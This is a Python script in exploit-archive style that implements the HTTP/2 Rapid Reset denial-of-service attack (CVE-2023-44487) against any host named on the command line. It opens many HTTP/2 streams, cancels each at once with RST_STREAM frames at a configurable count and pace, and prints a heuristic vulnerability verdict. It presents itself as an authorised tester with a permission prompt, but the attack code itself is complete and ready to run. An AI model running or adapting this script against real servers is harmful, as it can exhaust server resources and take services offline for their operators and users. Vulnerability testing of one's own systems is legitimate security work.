#!/usr/bin/env python3
"""
# Exploit Title: HTTP/2 2.0 - Denial Of Service (DOS)
# Google Dork: -NA-
# Date: 29th August 2025
# Exploit Author: Madhusudhan Rajappa
# Vendor Homepage: -NA-
# Software Link: -NA-
# Version: HTTP/2.0
# Tested on: -NA-
# CVE : CVE-2023-44487
"""
import asyncio
import ssl
import time
import argparse
import logging
from typing import Optional, Tuple
import statistics
# The hyper-h2 package is the only third-party dependency; fail early with a
# clear message when it is missing.
try:
    import h2.connection
    import h2.events
    import h2.exceptions
    import h2.config
except ImportError:
    # Raise SystemExit directly instead of calling exit(): exit() is injected
    # by the `site` module for interactive use and is not guaranteed to exist
    # (e.g. `python -S`). A string argument is printed to stderr and the
    # process exits with status 1.
    raise SystemExit("Error: h2 library not installed. Install with: pip install h2")
# Logging setup: timestamped, level-tagged records, INFO and above by default
# (main() lowers the root level to DEBUG when --verbose is given).
logging.basicConfig(
    format='%(asctime)s - %(levelname)s - %(message)s',
    level=logging.INFO,
)
# Module-level logger shared by everything in this file.
logger = logging.getLogger(__name__)
class HTTP2RapidResetTester:
    """Class to test for CVE-2023-44487 HTTP/2 Rapid Reset vulnerability.

    One instance wraps one TCP/TLS connection and one h2 state machine.
    Typical use: ``connect()``, then ``baseline_test()`` or
    ``rapid_reset_test()``, then ``close()``.  Both tests number their
    streams from 1, so each expects a freshly connected instance.
    """

    def __init__(self, host: str, port: int = 443, use_ssl: bool = True):
        self.host = host
        self.port = port
        self.use_ssl = use_ssl
        # h2.connection.H2Connection, created by connect()
        self.connection = None
        # asyncio StreamReader / StreamWriter pair, created by connect()
        self.reader = None
        self.writer = None
        # Elapsed times (seconds) recorded by the tests
        self.response_times = []
        # Human-readable error strings collected during the tests
        self.errors = []
        # True once the peer closed, an I/O error occurred, a GOAWAY was
        # received, or close() was called
        self.connection_closed = False

    async def connect(self) -> bool:
        """Establish HTTP/2 connection to the target server.

        Returns:
            True when the transport is open and the HTTP/2 preface was sent,
            False otherwise (the reason is logged and any half-open transport
            is released).
        """
        try:
            logger.info(f"Connecting to {self.host}:{self.port}")
            if self.use_ssl:
                ssl_context = ssl.create_default_context()
                ssl_context.set_alpn_protocols(['h2'])
                self.reader, self.writer = await asyncio.open_connection(
                    self.host, self.port, ssl=ssl_context
                )
                # Offering 'h2' does not guarantee the server picked it; if it
                # did not, every later result would be meaningless.
                ssl_object = self.writer.get_extra_info('ssl_object')
                negotiated = ssl_object.selected_alpn_protocol() if ssl_object else None
                if negotiated != 'h2':
                    raise ConnectionError(
                        f"server did not negotiate HTTP/2 via ALPN (got {negotiated!r})"
                    )
            else:
                self.reader, self.writer = await asyncio.open_connection(self.host, self.port)
            # Initialize HTTP/2 connection
            config = h2.config.H2Configuration(client_side=True)
            self.connection = h2.connection.H2Connection(config=config)
            self.connection.initiate_connection()
            # Clear the flag BEFORE sending: _send_data() is a no-op while it
            # is set, which would silently drop the preface on a reconnect.
            self.connection_closed = False
            # Send connection preface
            await self._send_data(self.connection.data_to_send())
            if self.connection_closed:
                raise ConnectionError("connection lost while sending the HTTP/2 preface")
            logger.info("HTTP/2 connection established successfully")
            return True
        except Exception as e:
            logger.error(f"Failed to establish connection: {e}")
            self._discard_transport()
            return False

    def _discard_transport(self):
        """Release a transport left over from a failed connect()."""
        if self.writer is not None:
            try:
                self.writer.close()
            except Exception as e:
                logger.debug(f"Error while discarding transport: {e}")
        self.reader = None
        self.writer = None
        self.connection_closed = True

    async def _send_data(self, data: bytes):
        """Send data to the server.

        Does nothing when there is no data, no writer, or the connection is
        already marked closed.  Transport errors are not raised; they mark
        the connection as closed instead.
        """
        if data and self.writer and not self.connection_closed:
            try:
                self.writer.write(data)
                await self.writer.drain()
            except (ConnectionResetError, BrokenPipeError, OSError) as e:
                logger.debug(f"Connection error while sending data: {e}")
                self.connection_closed = True

    async def _receive_data(self, timeout: float = 5.0) -> bytes:
        """Receive data from the server.

        Args:
            timeout: Maximum time to wait for data (seconds)
        Returns:
            The bytes read, or b'' on timeout, error, EOF, or when the
            connection is already closed.  EOF and transport errors mark the
            connection as closed; a timeout does not.
        """
        try:
            if self.connection_closed or not self.reader:
                return b''
            data = await asyncio.wait_for(self.reader.read(65535), timeout=timeout)
            if not data:
                # read() returning b'' means the peer closed the stream
                self.connection_closed = True
            return data
        except asyncio.TimeoutError:
            return b''
        except (ConnectionResetError, BrokenPipeError, OSError) as e:
            logger.debug(f"Connection error while receiving data: {e}")
            self.connection_closed = True
            return b''

    async def _process_incoming(self, data: bytes) -> list:
        """Feed received bytes to h2 and send whatever h2 queues in reply.

        Returns:
            The list of h2 events produced by ``data``.
        Raises:
            Whatever ``H2Connection.receive_data`` raises for invalid input.
        """
        events = self.connection.receive_data(data)
        for event in events:
            if isinstance(event, h2.events.DataReceived):
                # Hand flow-control credit back, otherwise the receive window
                # drains and response bodies stall.
                if event.flow_controlled_length:
                    self.connection.acknowledge_received_data(
                        event.flow_controlled_length, event.stream_id
                    )
            elif isinstance(event, h2.events.ConnectionTerminated):
                self.connection_closed = True
        # Flush SETTINGS ACKs / WINDOW_UPDATEs (no-op once marked closed)
        await self._send_data(self.connection.data_to_send())
        return events

    async def rapid_reset_test(self, num_streams: int = 100, delay: float = 0.001) -> dict:
        """
        Perform the rapid reset attack test.

        Streams are opened one after another (phase 1), then each is
        cancelled with RST_STREAM (phase 2), then the server's reaction is
        observed for up to 10 seconds (phase 3).

        Args:
            num_streams: Number of streams to create and reset
            delay: Delay between stream creations (seconds); resets are
                paced at one tenth of this value
        Returns:
            Dictionary with test results, or ``{'error': message}`` if an
            unexpected exception aborted the test.  ``reset_rate`` is the
            rate at which this client *sent* resets.
        """
        logger.info(f"Starting rapid reset test with {num_streams} streams")
        start_time = time.time()
        created_streams = []
        reset_streams = []
        # Same request on every stream
        headers = [
            (':method', 'GET'),
            (':path', '/'),
            (':scheme', 'https' if self.use_ssl else 'http'),
            (':authority', self.host),
            ('user-agent', 'CVE-2023-44487-Tester/1.0'),
        ]
        try:
            # Phase 1: Rapidly create streams
            for i in range(num_streams):
                if self.connection_closed:
                    logger.warning("Connection closed during stream creation")
                    break
                stream_id = (i * 2) + 1  # Odd numbers for client-initiated streams
                try:
                    # Send headers to create stream
                    self.connection.send_headers(stream_id, headers)
                    await self._send_data(self.connection.data_to_send())
                    created_streams.append(stream_id)
                    # Small delay to avoid overwhelming the connection
                    if delay > 0:
                        await asyncio.sleep(delay)
                except Exception as e:
                    self.errors.append(f"Error creating stream {stream_id}: {e}")
                    # Connection-level failures cannot recover; stop creating
                    if "connection" in str(e).lower():
                        break
            logger.info(f"Created {len(created_streams)} streams")
            # Phase 2: Rapidly reset all streams
            reset_start = time.time()
            for stream_id in created_streams:
                if self.connection_closed:
                    logger.warning("Connection closed during stream reset")
                    break
                try:
                    # Send RST_STREAM frame to cancel the request
                    self.connection.reset_stream(stream_id, error_code=0x8)  # CANCEL error code
                    await self._send_data(self.connection.data_to_send())
                    reset_streams.append(stream_id)
                    if delay > 0:
                        await asyncio.sleep(delay / 10)  # Faster resets
                except h2.exceptions.StreamClosedError:
                    # Stream already closed, continue
                    pass
                except Exception as e:
                    self.errors.append(f"Error resetting stream {stream_id}: {e}")
                    if "connection" in str(e).lower():
                        break
            reset_duration = time.time() - reset_start
            # Covers phases 1 and 2 only; the monitoring window is excluded
            total_duration = time.time() - start_time
            logger.info(f"Reset {len(reset_streams)} streams in {reset_duration:.3f}s")
            # Phase 3: Monitor server response
            await self._monitor_server_response(timeout=10.0)
            return {
                'streams_created': len(created_streams),
                'streams_reset': len(reset_streams),
                'total_duration': total_duration,
                'reset_duration': reset_duration,
                'reset_rate': len(reset_streams) / reset_duration if reset_duration > 0 else 0,
                'errors': len(self.errors),
                'response_times': self.response_times.copy(),
                'avg_response_time': statistics.mean(self.response_times) if self.response_times else 0,
                'connection_closed': self.connection_closed
            }
        except Exception as e:
            logger.error(f"Error during rapid reset test: {e}")
            return {'error': str(e)}

    async def _monitor_server_response(self, timeout: float = 10.0):
        """Monitor server responses and measure response times.

        Reads until ``timeout`` seconds have passed, the connection closes,
        or the server sends GOAWAY.  For every non-empty read, the time spent
        waiting for it is appended to ``self.response_times``.
        """
        logger.info("Monitoring server responses...")
        end_time = time.time() + timeout
        while not self.connection_closed:
            remaining = end_time - time.time()
            if remaining <= 0:
                break
            try:
                start = time.time()
                # Cap the read so the loop cannot overshoot its deadline
                data = await self._receive_data(timeout=min(5.0, remaining))
                response_time = time.time() - start
                if data:
                    self.response_times.append(response_time)
                    try:
                        # Process HTTP/2 events
                        events = await self._process_incoming(data)
                    except Exception as e:
                        logger.debug(f"Error processing HTTP/2 events: {e}")
                    else:
                        for event in events:
                            if isinstance(event, h2.events.ResponseReceived):
                                logger.debug(f"Response received on stream {event.stream_id}")
                            elif isinstance(event, h2.events.StreamReset):
                                logger.debug(f"Stream {event.stream_id} reset by server")
                            elif isinstance(event, h2.events.ConnectionTerminated):
                                logger.warning("Server terminated connection")
                                self.connection_closed = True
                                return
                await asyncio.sleep(0.1)
            except Exception as e:
                self.errors.append(f"Error monitoring response: {e}")
                break

    async def _await_response(self, stream_id: int, timeout: float = 5.0) -> bool:
        """Wait until response headers arrive for ``stream_id``.

        Returns:
            True when a ResponseReceived event for the stream is seen; False
            on timeout, when the server resets the stream, or when the
            connection closes first.
        """
        deadline = time.time() + timeout
        while not self.connection_closed:
            remaining = deadline - time.time()
            if remaining <= 0:
                break
            data = await self._receive_data(timeout=remaining)
            if not data:
                # Timeout or EOF; the loop conditions decide what happens next
                continue
            for event in await self._process_incoming(data):
                if getattr(event, 'stream_id', None) != stream_id:
                    continue
                if isinstance(event, h2.events.ResponseReceived):
                    return True
                if isinstance(event, h2.events.StreamReset):
                    logger.debug(f"Stream {stream_id} reset by server")
                    return False
        return False

    async def baseline_test(self, num_requests: int = 10) -> dict:
        """Perform baseline test with normal HTTP/2 requests.

        Requests are sent one at a time; a request counts as successful only
        when response headers for its own stream arrive within 5 seconds.

        Args:
            num_requests: Number of sequential GET requests to send
        Returns:
            Dictionary with request counts, total duration, average response
            time of the successful requests, and success rate.
        """
        logger.info(f"Performing baseline test with {num_requests} normal requests")
        start_time = time.time()
        successful_requests = 0
        # Timings of this run only, so the average is not skewed by samples
        # other tests stored in self.response_times
        request_times = []
        headers = [
            (':method', 'GET'),
            (':path', '/'),
            (':scheme', 'https' if self.use_ssl else 'http'),
            (':authority', self.host),
            ('user-agent', 'CVE-2023-44487-Baseline/1.0'),
        ]
        for i in range(num_requests):
            if self.connection_closed:
                logger.warning("Connection closed during baseline test")
                break
            stream_id = (i * 2) + 1
            try:
                request_start = time.time()
                self.connection.send_headers(stream_id, headers)
                self.connection.end_stream(stream_id)
                await self._send_data(self.connection.data_to_send())
                # Wait for response
                if await self._await_response(stream_id, timeout=5.0):
                    elapsed = time.time() - request_start
                    request_times.append(elapsed)
                    self.response_times.append(elapsed)
                    successful_requests += 1
                else:
                    logger.warning(f"No response received for request {i+1}")
                await asyncio.sleep(0.1)  # Small delay between requests
            except Exception as e:
                logger.warning(f"Error in baseline request {i+1}: {e}")
                if "connection" in str(e).lower():
                    break
        total_duration = time.time() - start_time
        return {
            'total_requests': num_requests,
            'successful_requests': successful_requests,
            'total_duration': total_duration,
            'avg_response_time': statistics.mean(request_times) if request_times else 0,
            'success_rate': successful_requests / num_requests if num_requests > 0 else 0
        }

    async def close(self):
        """Close the connection gracefully.

        A GOAWAY frame is attempted only while the connection is still
        considered open, but the transport is always released, even when the
        connection was already marked closed.  Safe to call more than once.
        """
        writer = self.writer
        if writer is None:
            self.connection_closed = True
            return
        try:
            if self.connection and not self.connection_closed:
                try:
                    # Send GOAWAY frame if possible
                    self.connection.close_connection()
                    await self._send_data(self.connection.data_to_send())
                except Exception as e:
                    logger.debug(f"Error sending GOAWAY frame: {e}")
            # Close the writer unconditionally so the socket is not leaked
            writer.close()
            # Wait for close with timeout to avoid hanging
            try:
                await asyncio.wait_for(writer.wait_closed(), timeout=2.0)
            except asyncio.TimeoutError:
                logger.debug("Timeout waiting for connection to close")
            except (ConnectionResetError, BrokenPipeError, OSError):
                # Connection already closed by peer, this is expected
                pass
        except Exception as e:
            logger.debug(f"Error during connection cleanup: {e}")
        finally:
            self.connection_closed = True
            self.reader = None
            self.writer = None
async def main():
    """Command-line entry point.

    Parses arguments, asks the operator to confirm authorization, runs the
    baseline test and (unless --baseline-only) the rapid reset test on a
    fresh connection, then prints the results and a heuristic analysis.
    """
    parser = argparse.ArgumentParser(
        description='CVE-2023-44487 HTTP/2 Rapid Reset Vulnerability Tester',
        epilog='WARNING: Only use on systems you own or have permission to test!'
    )
    parser.add_argument('host', help='Target hostname')
    parser.add_argument('-p', '--port', type=int, default=443, help='Target port (default: 443)')
    parser.add_argument('--no-ssl', action='store_true', help='Disable SSL/TLS')
    parser.add_argument('-s', '--streams', type=int, default=100,
                        help='Number of streams for rapid reset test (default: 100)')
    parser.add_argument('-d', '--delay', type=float, default=0.001,
                        help='Delay between stream operations (default: 0.001s)')
    parser.add_argument('--baseline-only', action='store_true',
                        help='Only perform baseline test')
    parser.add_argument('-v', '--verbose', action='store_true', help='Verbose output')
    args = parser.parse_args()
    # With zero streams nothing is sent, yet the analysis below would still
    # print a verdict; reject that up front.
    if args.streams < 1:
        parser.error('--streams must be at least 1')
    if args.verbose:
        logging.getLogger().setLevel(logging.DEBUG)
    print("=" * 60)
    print("CVE-2023-44487 HTTP/2 Rapid Reset Vulnerability Tester")
    print("=" * 60)
    print(f"Target: {args.host}:{args.port}")
    print(f"SSL: {'Enabled' if not args.no_ssl else 'Disabled'}")
    print()
    # Legal disclaimer
    print("LEGAL DISCLAIMER:")
    print("This tool is for authorized security testing only.")
    print("Ensure you have permission to test the target system.")
    print("Unauthorized use may be illegal.")
    print()
    try:
        response = input("Do you have permission to test this system? (yes/no): ")
    except EOFError:
        # No interactive stdin: treat as "not confirmed"
        response = ''
    # Tolerate surrounding whitespace; anything but an explicit "yes" aborts
    if response.strip().lower() != 'yes':
        print("Exiting. Only use this tool on systems you're authorized to test.")
        return
    tester = HTTP2RapidResetTester(args.host, args.port, not args.no_ssl)
    try:
        # Connect to target
        if not await tester.connect():
            logger.error("Failed to establish connection. Exiting.")
            return
        # Perform baseline test
        print("\n" + "="*40)
        print("BASELINE TEST")
        print("="*40)
        baseline_results = await tester.baseline_test()
        print("Baseline Results:")
        print(f" Total Requests: {baseline_results['total_requests']}")
        print(f" Successful: {baseline_results['successful_requests']}")
        print(f" Success Rate: {baseline_results['success_rate']:.2%}")
        print(f" Avg Response Time: {baseline_results['avg_response_time']:.3f}s")
        print(f" Total Duration: {baseline_results['total_duration']:.3f}s")
        if not args.baseline_only:
            # Reset connection for rapid reset test
            await tester.close()
            tester = HTTP2RapidResetTester(args.host, args.port, not args.no_ssl)
            if not await tester.connect():
                logger.error("Failed to re-establish connection for rapid reset test.")
                return
            # Perform rapid reset test
            print("\n" + "="*40)
            print("RAPID RESET TEST (CVE-2023-44487)")
            print("="*40)
            print(f"Testing with {args.streams} streams...")
            rapid_results = await tester.rapid_reset_test(args.streams, args.delay)
            if 'error' in rapid_results:
                print(f"Test failed: {rapid_results['error']}")
            else:
                print("Rapid Reset Results:")
                print(f" Streams Created: {rapid_results['streams_created']}")
                print(f" Streams Reset: {rapid_results['streams_reset']}")
                print(f" Reset Rate: {rapid_results['reset_rate']:.1f} resets/second")
                print(f" Total Duration: {rapid_results['total_duration']:.3f}s")
                print(f" Reset Duration: {rapid_results['reset_duration']:.3f}s")
                print(f" Errors: {rapid_results['errors']}")
                print(f" Avg Response Time: {rapid_results['avg_response_time']:.3f}s")
                if rapid_results.get('connection_closed'):
                    print(" Connection Status: Server closed connection during test")
                # Analysis
                print("\n" + "="*40)
                print("VULNERABILITY ANALYSIS")
                print("="*40)
                if rapid_results.get('connection_closed'):
                    print("Server closed connection during rapid reset test")
                    print(" This could indicate protective measures or resource exhaustion.")
                if rapid_results['streams_reset'] < rapid_results['streams_created'] * 0.8:
                    print("WARNING: Server may have rejected many reset requests")
                    print(" This could indicate protective measures are in place.")
                # NOTE(review): reset_rate is the rate at which this client
                # sent RST_STREAM frames, so it mostly reflects --delay. Treat
                # the verdict below as a rough hint, not proof of server-side
                # behavior; confirm against server logs/metrics.
                if rapid_results['reset_rate'] > 1000:
                    print("HIGH RISK: Server accepts very high reset rates")
                    print(" This may indicate vulnerability to CVE-2023-44487")
                elif rapid_results['reset_rate'] > 100:
                    print("MEDIUM RISK: Server accepts moderate reset rates")
                    print(" Further testing may be needed")
                else:
                    print("LOWER RISK: Server has rate limiting on resets")
                    print(" This suggests some protection against the vulnerability")
                if len(tester.errors) > rapid_results['streams_created'] * 0.1:
                    print("Many errors occurred during testing")
                    print(" Results may not be reliable")
    except KeyboardInterrupt:
        print("\nTest interrupted by user")
    except Exception as e:
        logger.error(f"Unexpected error: {e}")
    finally:
        # Always release the connection, whichever path got us here
        try:
            await tester.close()
        except Exception as e:
            logger.debug(f"Error during final cleanup: {e}")
        print("\nTest completed.")
# Script entry point: print a short banner, then drive the async main().
if __name__ == "__main__":
    print(
        "CVE-2023-44487 HTTP/2 Rapid Reset Vulnerability Tester",
        "Requires: pip install h2",
        "",
        sep="\n",
    )
    try:
        asyncio.run(main())
    except KeyboardInterrupt:
        # Ctrl-C that escaped main(): leave quietly
        print("\nExiting...")
    except Exception as exc:
        logger.error(f"Fatal error: {exc}")